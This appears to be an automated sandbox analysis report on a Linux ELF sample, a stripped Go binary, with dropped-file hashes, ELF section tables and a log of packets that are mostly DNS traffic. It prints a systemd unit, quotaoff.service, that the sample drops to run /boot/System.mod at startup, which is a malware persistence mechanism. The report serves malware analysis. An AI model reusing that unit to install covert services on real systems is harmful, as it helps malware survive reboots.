Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/6411/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/6472/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:lVLjvn:PLjvn
MD5:	45261826B7D3C52B7F54897A45543D43
SHA1:	6BD7C080556D8590CA23033535AE2404B6357282
SHA-256:	0A7FB98186AC6639C69269369AB04DC96AA9356ACE3DC70787B82FF03F2E7F22
SHA-512:	04763A3042368B9B22D9430EE7A531645EF3567B4013302816F64D16E0AF8B2CB2C21180EC847BAC609A1D1EE0203A395D3760D7DD60842DE16D495EF36DAB13
Malicious:	false
Preview:	6510.6510.

/usr/lib/systemd/system/quotaoff.service

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.795801274247707
Encrypted:	false
SSDEEP:	3:zMZa7kKXtERv+2AXTMikAdIgQ+NRs7WRA2Iav817WRA2IavpsRs7WRA2Iav2rSkc:z86XWRBADMD+ns7Hvx17Hv2sRs7HvtLc
MD5:	B02DE6CD28CD922B18D9D93375A70D8B
SHA1:	021426A5A2FF9EDC80BA5936C94B37525538885E
SHA-256:	D8D8E5CD33AA3450CD74C63716A02F3DFF39EFEF2836559F110BC93663B1380A
SHA-512:	DB3FE03AD5E599E6C03AAEC7BF1242F5509FBB624ADB9AFB7499E25487DAEF3F3F1C6BABF51570B527A5AC5C9F4B079AE4CC53BAA9497C0A121328BEF8D04422
Malicious:	false
Preview:	[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.mod.ExecReload=/boot/System.mod.ExecStop=/boot/System.mod.[Install].WantedBy=multi-user.target

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, Go BuildID=zD2CFKuxStijYrt8I70M/nlSSTbg8MZjEss1uiU5o/EgRnuJHvCxeVhr5GGifx/__JA5AVeisFT4xhItBVY, stripped
Entropy (8bit):	6.165024243449033
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	Ww0lpzmYHO.elf
File size:	1'916'928 bytes
MD5:	3b0cc5dd65238abdc55e9c47d0d8660f
SHA1:	81d42740e04d5378d96c1a8ebd7de21863225dc4
SHA256:	a65f1664ac6666e1e1b324464d5a3a125c89764940a022d056b9a2d65ad5ed0e
SHA512:	dbd19679e394a0ca56742f6b29fb8fc15adb0bfa6f714250b788a9b53199a1a74c9c39a94ea13fc5b06b846cc93c86f56ccdf34ffd1ad8cd09e826cf513f99df
SSDEEP:	24576:ae9ufJvk4gQjMNRfktnsIXvZFyD9i+MPCIxyuzNqssZXJj4bdYVVMtIwWz1v:WYMnwRO4ssPcd5Wz1
TLSH:	A0951711F98B54F2E9071A3104AFA26F27319D054F34EBC7EA40BB6AFD776D20932259
File Content Preview:	.ELF....................P...4...........4. ...(.........4...4...4...................................d...d....................................................`...`..8...8....................` ..` ..X..H...........Q.td...............................e.......

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80aad50
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	7
Section Header Offset:	276
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	3

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x8049000	0x1000	0xdc5ec	0x0	0x6	AX	16
.rodata	PROGBITS	0x8126000	0xde000	0x4cd5a	0x0	0x2	A	32
.shstrtab	STRTAB	0x0	0x12ad60	0x98	0x0	0x0		1
.typelink	PROGBITS	0x8172e00	0x12ae00	0x8d8	0x0	0x2	A	32
.itablink	PROGBITS	0x81736e0	0x12b6e0	0x120	0x0	0x2	A	32
.gosymtab	PROGBITS	0x8173800	0x12b800	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x8173800	0x12b800	0x91a38	0x0	0x2	A	32
.go.buildinfo	PROGBITS	0x8206000	0x1be000	0xf0	0x0	0x3	WA	16
.noptrdata	PROGBITS	0x8206100	0x1be100	0x1162c	0x0	0x3	WA	32
.data	PROGBITS	0x8217740	0x1cf740	0x40a8	0x0	0x3	WA	32
.bss	NOBITS	0x821b800	0x1d3800	0x129ec	0x0	0x3	WA	32
.noptrbss	NOBITS	0x822e200	0x1e6200	0x3e48	0x0	0x3	WA	32
.note.go.buildid	NOTE	0x8048f9c	0xf9c	0x64	0x0	0x2	A	4

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x34	0x8048034	0x8048034	0xe0	0xe0	2.7621	0x4	R	0x1000
NOTE	0xf9c	0x8048f9c	0x8048f9c	0x64	0x64	5.2608	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x8048000	0x8048000	0xdd5ec	0xdd5ec	6.1354	0x5	R E	0x1000	.text .note.go.buildid
LOAD	0xde000	0x8126000	0x8126000	0xdf238	0xdf238	5.6495	0x4	R	0x1000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x1be000	0x8206000	0x8206000	0x15800	0x2c048	5.1806	0x6	RW	0x1000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4
LOOS+5041580	0x0	0x0	0x0	0x0	0x0	0.0000	0x2a00		0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 03:56:42.277702093 CET	443	39256	34.249.145.219	192.168.2.23
Nov 2, 2024 03:56:42.277851105 CET	39256	443	192.168.2.23	34.249.145.219
Nov 2, 2024 03:56:42.282712936 CET	443	39256	34.249.145.219	192.168.2.23
Nov 2, 2024 03:56:43.726561069 CET	43928	443	192.168.2.23	91.189.91.42
Nov 2, 2024 03:56:50.825454950 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:50.830404997 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:50.830470085 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:50.830485106 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:50.830528975 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:50.835356951 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:50.835367918 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:51.466974974 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:51.467145920 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:51.473386049 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:51.475776911 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:51.478440046 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:51.480628967 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:51.605514050 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:51.605596066 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:51.606592894 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:51.606654882 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:52.611937046 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:52.612117052 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:52.616800070 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:52.616852999 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:52.743417978 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:52.743428946 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:52.743535995 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:52.743566990 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:53.748439074 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:53.748620987 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:53.753360033 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:53.753371954 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:53.879376888 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:53.879450083 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:54.884054899 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:54.884303093 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:54.888895035 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:54.889097929 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:55.015186071 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:55.015352011 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:56.020287037 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:56.020502090 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:56.040842056 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:56.227579117 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:56.227591991 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:56.227600098 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:56.353785038 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:56.353920937 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:56.354254961 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:56.354311943 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:57.359783888 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:57.360002995 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:57.364691019 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:57.364717007 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:57.490953922 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:57.490967035 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:57.491053104 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:57.491087914 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:58.496243000 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:58.496493101 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:58.501028061 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:58.501224041 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:58.627209902 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:58.627240896 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:58.627284050 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:58.627327919 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:59.340477943 CET	42516	80	192.168.2.23	109.202.202.202
Nov 2, 2024 03:56:59.631532907 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:59.631799936 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:59.636370897 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:59.636503935 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:59.762600899 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:59.762617111 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:56:59.762691021 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:56:59.762720108 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:00.767141104 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:00.767585993 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:00.772017956 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:00.772336006 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:00.898201942 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:00.898281097 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:01.902688980 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:01.903151989 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:01.909069061 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:01.910015106 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:02.035212040 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:02.035300970 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:02.035979986 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:02.036016941 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:03.041054010 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:03.041153908 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:03.045964956 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:03.046006918 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:03.172214031 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:03.172225952 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:03.172251940 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:03.172270060 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:04.178806067 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:04.179040909 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:04.183640003 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:04.183909893 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:04.309899092 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:04.310009003 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:05.315104961 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:05.315501928 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:05.319901943 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:05.320276022 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:05.445926905 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:05.446005106 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:05.446199894 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:05.446235895 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:05.483525038 CET	43928	443	192.168.2.23	91.189.91.42
Nov 2, 2024 03:57:06.451746941 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:06.452193022 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:06.456692934 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:06.456979036 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:06.591854095 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:06.591871023 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:06.591981888 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:06.592011929 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:07.599009991 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:07.599147081 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:07.603821993 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:07.603863955 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:07.729707003 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:07.729783058 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:07.730097055 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:07.730142117 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:08.736738920 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:08.736849070 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:08.742621899 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:08.742634058 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:08.869858980 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:08.869936943 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:09.875456095 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:09.875597000 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:09.880273104 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:09.880319118 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:10.006472111 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:10.006547928 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:10.006601095 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:10.006666899 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:11.012686014 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:11.012744904 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:11.018172979 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:11.019228935 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:11.331187010 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:11.331196070 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:11.331206083 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:11.331299067 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:11.331299067 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:11.331299067 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:12.336081028 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:12.336368084 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:12.340912104 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:12.341142893 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:12.466730118 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:12.466805935 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:12.467066050 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:12.467113972 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:13.475521088 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:13.475676060 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:13.480372906 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:13.480386019 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:13.606221914 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:13.606280088 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:13.606543064 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:13.606585026 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:14.611634016 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:14.611787081 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:14.616487980 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:14.616512060 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:14.742590904 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:14.742671967 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:14.742693901 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:14.742717981 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:15.747915030 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:15.748225927 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:15.753010988 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:15.753103018 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:15.879020929 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:15.879108906 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:15.879112005 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:15.879134893 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:16.887691021 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:16.888500929 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:16.892544031 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:16.893229008 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:17.019388914 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:17.019407034 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:17.019516945 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:17.019516945 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:18.027771950 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:18.028121948 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:18.032572031 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:18.032866001 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:18.158709049 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:18.158721924 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:18.158854961 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:18.158854961 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:19.165117979 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:19.165554047 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:19.169958115 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:19.170334101 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:19.296253920 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:19.296345949 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:20.301353931 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:20.301523924 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:20.306201935 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:20.306247950 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:20.432281971 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:20.432367086 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:20.432365894 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:20.432431936 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:21.438817978 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:21.439158916 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:21.443818092 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:21.443928003 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:21.570107937 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:21.570216894 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:22.576751947 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:22.576953888 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:22.581602097 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:22.581664085 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:22.707669973 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:22.707712889 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:22.707767010 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:22.707767010 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:23.713649988 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:23.713835955 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:23.718470097 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:23.718575954 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:23.844480991 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:23.844683886 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:23.845989943 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:23.846105099 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:24.852494955 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:24.852716923 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:24.857407093 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:24.857448101 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:24.983661890 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:24.983715057 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:24.983803988 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:24.983838081 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:25.993796110 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:25.994683027 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:25.998600006 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:25.999434948 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:26.124747038 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:26.124984026 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:26.125277996 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:26.125336885 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:26.125930071 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:26.126063108 CET	42106	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:26.131644964 CET	53	42106	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:27.132764101 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:27.137609959 CET	53	42170	8.8.8.8	192.168.2.23
